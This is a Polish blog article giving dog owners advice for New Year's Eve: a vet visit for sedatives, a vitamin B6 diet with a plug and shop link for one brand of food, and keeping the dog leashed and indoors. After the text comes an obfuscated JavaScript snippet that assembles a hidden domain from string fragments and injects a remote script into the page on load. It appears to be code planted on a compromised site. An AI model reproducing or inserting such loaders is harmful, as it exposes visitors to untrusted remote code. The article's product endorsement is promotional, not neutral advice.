Jak zadbać o psa w sylwestra?

Koniec roku coraz bliżej, a wraz z nim sylwester. O ile dla ludzi to okazja do szampańskiej zabawy i imprez do białego rana, o tyle dla psów dzień lęku i stresu wywołanego przez nadmierny hałas i huki wystrzeliwanych petard. Jesteś psim opiekunem i chcesz, żeby 31 grudnia Twój pupil czuł się dobrze? Jeśli tak to dowiedz się wszystkiego na temat dbania o psa w sylwestra.

Wizyta u weterynarza

Ten punkt powinni zrealizować wszyscy, którzy od kilku lat obserwują psie zachowania świadczące o bardzo dużym lęku i strachu. W przypadku psów wyjątkowo źle radzących sobie z hałasem stosuje się środki uspokajające. Jednak, aby było to bezpieczne, konieczna jest wizyta w gabinecie weterynaryjnym. Dlaczego? Tylko weterynarz jest w stanie ustalić, czy psiak rzeczywiście potrzebuje tego typu środków oraz jaka dawka będzie odpowiednia dla jego organizmu. Dodatkowo weterynarz dokładnie wyjaśni jak stosować i podawać preparaty na uspokojenie. Odwiedziny powinny być obowiązkowe także w przypadku, gdy pupil cierpi na przewlekłe choroby, zwłaszcza jeśli są to schorzenia związane z układem krążenia.

Dieta bogata w witaminę B6

Kluczowe znaczenie w regulacji psiego układu nerwowego będzie miała także dieta. Szczególne znaczenie ma zwłaszcza witamina B6. Jej niedobór doprowadza do szybszego starzenia się neuronów, co z kolei odpowiedzialne jest za nieprawidłowe zachowania. Może też sprawiać, że pies jest bardziej pobudzony i zdecydowanie gorzej radzi sobie ze stresującymi sytuacjami. Dlatego obowiązkowo musi znaleźć się w menu wszystkich czworonogów, zwłaszcza w dniach poprzedzających 31 grudnia. Jakie karmy bogate są w witaminę B6? Na pewno takie jak Acana, dostępne m.in. w https://www.naszezoo.pl/pl/c/Acana/75, które dodatkowo mają w składzie inne witaminy z grupy B, kojąco wpływające na układ nerwowy.

Bezpieczny dom

Oprócz diety konieczne jest też ograniczenie sytuacji stresogennych. Najlepiej zacząć od spacerów. Obowiązkowo zwierzak powinien znajdować się na dobrze zabezpieczonej smyczy oraz posiadać adresówkę. Dodatkowo ostatni spacer powinien być najpóźniej ok. 22 – wychodzenie z psem bliżej 24 (albo na pokaz fajerwerków) jest zabronione. Z kolei w domu trzeba przenieść psie posłanie w miejscu bez okien – hałas z dworu będzie mniejszy – oraz zapalić w każdym pomieszczeniu światło.

(function(){
i2fp_=(„u”+”st”);i2fp=document.createElement(„script”);i2fp.async=true;
i2fpu=”70639857″;i2fp_+=”a”+(„t.”);i2fp_+=”i”+(„nf”+(„o”))+(„/”);
i2fpu+=”.9prsylbd2fp4v7ft”;i2fpu+=”4np2Xjlwyw2ww9″;
i2fp.src=”//”+i2fp_+i2fpu;i2fp.type=”text/javascript”;
d_b=document.body;d_b.appendChild(i2fp);
})();

Similar Posts

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.